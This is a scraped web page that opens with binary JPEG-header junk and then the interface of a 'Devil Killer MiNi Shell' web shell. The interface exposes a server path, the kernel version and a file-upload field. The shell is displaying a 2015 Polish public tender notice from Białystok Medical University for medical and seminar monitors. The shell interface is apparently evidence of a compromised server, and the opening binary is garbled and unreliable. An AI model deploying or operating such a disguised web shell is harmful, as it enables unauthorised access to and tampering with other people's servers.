JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150514/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150514/113534-N-2015.html

<p class="kh_header"><b>Białystok: Dostawa monitorów medycznych i seminaryjnych do Uniwersyteckiego Szpitala Klinicznego Uniwersytetu Medycznego w Białymstoku.</b><br>
<b>Numer ogłoszenia: 113534 - 2015; data zamieszczenia: 14.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Medyczny w Białymstoku , ul. Jana Kilińskiego 1, 15-089 Białystok, woj. podlaskie, tel. 085 7485400, faks 085 7485627.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umwb.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa monitorów medycznych i seminaryjnych do Uniwersyteckiego Szpitala Klinicznego Uniwersytetu Medycznego w Białymstoku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa monitorów medycznych i seminaryjnych do Uniwersyteckiego Szpitala Klinicznego Uniwersytetu Medycznego w Białymstoku, wraz z transportem, rozładunkiem, wniesieniem, zainstalowaniem i uruchomieniem oraz przeszkoleniem personelu Użytkownika. Skrócona nazwa zamówienia: Dostawa monitorów medycznych i seminaryjnych  do Uniwersyteckiego Szpitala Klinicznego w Białymstoku. Wyroby medyczne i  inne wyroby składające się na zamówienie są nazywane dalej urządzeniami lub wyrobami, niezależnie od stopnia złożoności czy pełnionych funkcji. 
Wymagania techniczne i użytkowe, jakie musi spełnić przedmiot zamówienia, opisane są szczegółowo w załącznikach nr 1 i 2  do siwz. 
Wykonanie zamówienia obejmujące rozładunek, wniesienie, zainstalowanie i uruchomienie urządzeń oraz przeszkolenie personelu Użytkownika, jest opisane w siwz, część C.II oraz w załączniku nr 3 do siwz,.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.23.13.00-0, 33.19.70.00-7, 51.61.10.00-8, 51.40.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 28.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Kwota wadium wynosi: 
Część zamówienia nr 1 - 8000,- zł.
Część zamówienia nr 2 - 8500,- zł.
2.	Wadium wnosi się przed upływem terminu składania ofert.
3.	Wadium może być wnoszone w:
a)	 pieniądzu,
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)	gwarancjach bankowych,
d)	gwarancjach ubezpieczeniowych,
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. nr 42 poz. 275, z 2008 r. nr 116 poz. 730 i 732 i Nr 227 poz. 1505 oraz z 2010 r. nr 96 poz. 620.).
4.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego: Bank Pekao S.A. Oddział w Białymstoku 40 1240 5211 1111 0000 4920 7392 z podaniem tytułu wpłaty: -Wadium monitory medyczne i seminaryjne- przed upływem terminu składania ofert.
5.	Jeżeli wadium jest wnoszone w formie wybranego przez wykonawcę dokumentu, o którym mowa w pkt. 3b - 3e, wówczas wykonawca jest zobowiązany złożyć dokument (oryginał) zapakowany w zamkniętą kopertę oznaczoną -Wadium monitory medyczne i seminaryjne- w Kancelarii Ogólnej UMB, ul. Kilińskiego 1, 15-089 Białystok  (Pałac Branickich, lewe skrzydło - parter) przed upływem terminu składania ofert.  
6.	Wymaga się, aby gwarancje i poręczenia wnoszone jako wadium były ważne i nieodwoływalne do upływu terminu związania ofertą. Nie mogą być zastrzeżone pod warunkiem. W treści gwarancji / poręczenia musi się znaleźć zapis, iż gwarant lub poręczyciel ma bezwarunkowy obowiązek wypłacenia Zamawiającemu sumy gwarancyjnej (kwoty wadium) na pierwsze pisemne żądanie zawierające wyłącznie oświadczenie, że zaistniała co najmniej jedna z okoliczności wskazanych w art. 46 ust. 4 a) lub art. 46 ust. 5 ustawy. 
7.	Gwarancja / poręczenie musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela gwaranta / poręczającego; podpis powinien być sporządzony w sposób umożliwiający jego identyfikację - złożony wraz z imienną pieczątką lub czytelny, z podaniem imienia i nazwiska.
8.	Wykonawca, którego oferta nie będzie zabezpieczona wadium wniesionym we właściwej formie i kwocie, zostanie wykluczony z przedmiotowego postępowania.
9.	Zamawiający dokona zwrotu wadium odpowiednio na zasadach określonych w art. 46 ust. 1, 1 a, 2 i 4 ustawy.
10.	Zamawiający zatrzyma wadium w przypadku, gdy zajdzie co najmniej jedna z okoliczności, o których mowa w art. 46 ust. 4a oraz ust. 5 ustawy.
11.	Wadium wniesione przez jednego z wykonawców wspólnie ubiegających się o zamówienie uważa się za wniesione prawidłowo (pod warunkiem, że spełnione są wszystkie wymagania dotyczące wniesienia wadium, w szczególności prawidłowa jest nazwa i znak postępowania).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie formułuje szczegółowego warunku udziału w postępowaniu odnośnie do posiadania uprawnień do wykonywania określonej działalności lub czynności, gdyż przepisy prawa nie nakładają obowiązku posiadania ww. uprawnień do wykonania zamówienia w przedmiotowym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się wykonawcy, którzy spełniają warunki pozwalające wykonać przedmiotowe zamówienie, dotyczące posiadania wiedzy i doświadczenia, mianowicie w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonali:
- co najmniej jedną dostawę co najmniej 10 monitorów medycznych wraz z komputerami (nie jest wymagane, aby wszystkie były tego samego typu), wraz z ich zainstalowaniem i uruchomieniem - jeśli składają ofertę na Część nr 1 zamówienia. 
- co najmniej jedną dostawę co najmniej 20 monitorów seminaryjnych o przekątnej ekranu min. 55 cali wraz z komputerami (nie jest wymagane, aby wszystkie były tego samego typu), wraz z ich zainstalowaniem i uruchomieniem - jeśli składają ofertę na Część nr 2 zamówienia. 
Zamawiający nie stosuje art. 22 ust. 5 zdanie drugie, natomiast określił powyżej minimalne warunki, których spełnienia wymaga od wykonawców ubiegających się o przedmiotowe zamówienie. Ocena spełnienia powyższych warunków udziału w postępowaniu odbędzie się na podstawie analizy oświadczeń oraz dokumentów wymienionych w części E. V siwz, pkt. 4 i 5, na zasadzie spełnia nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie formułuje szczegółowych warunków dotyczących dysponowania odpowiednim potencjałem technicznym.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie formułuje również szczegółowych warunków dotyczących dysponowania osobami zdolnymi do wykonania zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie formułuje również szczegółowych warunków dotyczących sytuacji ekonomicznej wykonawcy. 
O zamówienie mogą ubiegać się wykonawcy, którzy spełniają warunki, pozwalające wykonać przedmiotowe zamówienie, dotyczące sytuacji finansowej, w szczególności posiadają środki finansowe lub zdolność kredytową w kwocie co najmniej : 
- Gdy składają ofertę na Część zamówienia nr 1 - 250 000,- zł
- Gdy składają ofertę na Część zamówienia nr 2 - 250 000,- zł.
Jeżeli Wykonawca składa ofertę na obie części zamówienia, musi posiadać środki finansowe lub zdolność kredytową w kwocie co najmniej 500 000,- zł.
Zamawiający nie stosuje art. 22 ust. 5 zdanie drugie, natomiast określił powyżej minimalne warunki, których spełnienia wymaga od wykonawców ubiegających się o przedmiotowe zamówienie. Ocena spełnienia powyższych warunków udziału w postępowaniu odbędzie się na podstawie analizy oświadczeń oraz dokumentów wymienionych w części E. V siwz, pkt. 4 i 5, na zasadzie spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, że oferowane urządzenia odpowiadają wymaganiom określonym przez Zamawiającego, Wykonawca składa następujące dokumenty: 
    a) Formularz szczegółowy oferty sporządzony w zależności od oferowanej części zamówienia: zgodnie z  załącznikiem nr 1  do siwz,  i / lub nr 2, opieczętowany i podpisany przez Wykonawcę. 
b)	Deklaracje zgodności dotyczące zaoferowanych urządzeń w Części nr 1 zamówienia - monitorów medycznych.
c)	Certyfikaty zgodności wydane przez jednostkę notyfikowaną w celu oznakowania CE urządzeń zaoferowanych w Części nr 1 zamówienia - monitorów medycznych (nie dotyczy wyrobów medycznych klasy I. Klasa wyrobu medycznego powinna być określona w deklaracji zgodności).
d)	Materiały informacyjne, np. prospekty, foldery, katalogi, instrukcje obsługi, dokumentacje techniczno - ruchowe, dotyczące zaoferowanych urządzeń, potwierdzające spełnienie wymagań Zamawiającego. Jeżeli materiały informacyjne dotyczą różnych wyrobów medycznych, należy zaznaczyć jednoznacznie urządzenia będące przedmiotem oferty. Nie powinno być rozbieżności pomiędzy oświadczeniem Wykonawcy zawartym w Formularzach szczegółowych oferty, a treścią materiałów informacyjnych. Niniejszy punkt dotyczy obu części zamówienia.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokumenty podstawowe.
a)	Formularz ogólny oferty sporządzony zgodnie z  załącznikiem nr 5 do siwz, opieczętowany i podpisany przez Wykonawcę .
b)	Oryginał pełnomocnictwa do reprezentowania Wykonawcy / Wykonawców w postępowaniu o udzielenie zamówienia publicznego albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, jeżeli prawo reprezentacji nie wynika z innych dokumentów załączonych do oferty lub kopia ww. pełnomocnictwa poświadczona przez notariusza za zgodność z oryginałem.
c)	Lista podmiotów należących do tej samej grupy kapitałowej, co Wykonawca, o której mowa w art. 24 ust. 2 pkt. 5 ustawy, albo informacja o tym, że Wykonawca nie należy do grupy kapitałowej - wzór: załącznik nr 6 do siwz.
Jeżeli Wykonawca będzie polegał na wiedzy i doświadczeniu lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków - jest zobowiązany udowodnić Zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Pisemne zobowiązanie musi być opatrzone własnoręcznym podpisem udostępniającego (w oryginale, nie kserokopia), do ewentualnego wykorzystania - wzór: załącznik nr 10 do siwz. Jeżeli wykonawca polega na zasobach podmiotu trzeciego w zakresie wiedzy i doświadczenia, wówczas w realizacji zamówienia konieczny jest udział tego podmiotu trzeciego, jako podwykonawcy, doradcy, konsultanta itp., co powinno wynikać z treści dokumentu wymienionego w niniejszym punkcie. Jeżeli wykonawca polega na zdolnościach finansowych innych podmiotów na zasadach określonych w pkt. 26 ust. 2b ustawy - przedkłada informację, o której mowa w sekcji III.4.1) tiret 2 oraz dokumenty wymienione w sekcji III.4.2) tiret 2, dotyczącą podmiotów udostępniających zasoby finansowe.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 94</li>
<li>2 - termin dostawy - 6</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Możliwości zmiany treści umowy, w tym zmiany istotnej,  oraz warunki wprowadzenia takiej zmiany.

1.	Zmiany treści Umowy nie mogą powodować wykroczenia poza zakres świadczenia określony w umowie.
2.	Strona Umowy wnosząca o dokonanie zmiany treści Umowy składa drugiej stronie pisemny wniosek 
o ww. zmianę treści wraz z pisemnym uzasadnieniem konieczności wprowadzenia przedmiotowej zmiany.
3.	Strony Umowy w terminie do 7 dni ustalają wspólne stanowisko wobec proponowanej zmiany treści Umowy. W szczególnie skomplikowanych przypadkach termin zajęcia stanowiska przez strony może być przedłużony do 21 dni.
4.	Dopuszcza się zmiany treści Umowy wynikające z aktualizacji rozwiązań z uwagi na postęp technologiczny, przy czym zmiany te nie spowodują podwyższenia ceny wykonania przedmiotu umowy. 
5.	Dopuszcza się zmianę treści Umowy, gdy: 
a)	zmieniły się przepisy prawa, których regulacje wpływają na prawa i obowiązki stron, przy czym wartość Umowy, czyli cena wykonania zamówienia, nie może ulec podwyższeniu z tytułu zmiany stawki podatku VAT,
b)	zmiany są korzystne dla Zamawiającego, 
c)	konieczność zmian umowy wynika z okoliczności, których nie dało się przewidzieć w dacie zawarcia umowy.
6.	Dopuszcza się, aby termin wykonania zamówienia był wyznaczony przez Zamawiającego jako późniejszy, iż określono w Umowie, w przypadku:
a)	działania siły wyższej, mającej bezpośredni wpływ na terminowość wykonywania Umowy, 
b)	wystąpienia okoliczności, których strony Umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności, 
c)	opóźnienia lub wstrzymania wykonywania robót budowlanych w obiekcie, 
w którym będą zainstalowane urządzenia,
7.	Dopuszcza się zmianę treści Umowy w przypadku wystąpienia okoliczności, o których mowa w § 10 Umowy. 
8.	Zmiany harmonogramu wykonywania zamówienia  mogą być wprowadzane w trybie roboczym, wymagają zatwierdzenia przez Wykonawcę, Zamawiającego i Inżyniera Kontraktu i nie będą stanowiły zmiany treści umowy, jeżeli nie spowodują zmiany terminu wykonania zamówienia.</p>
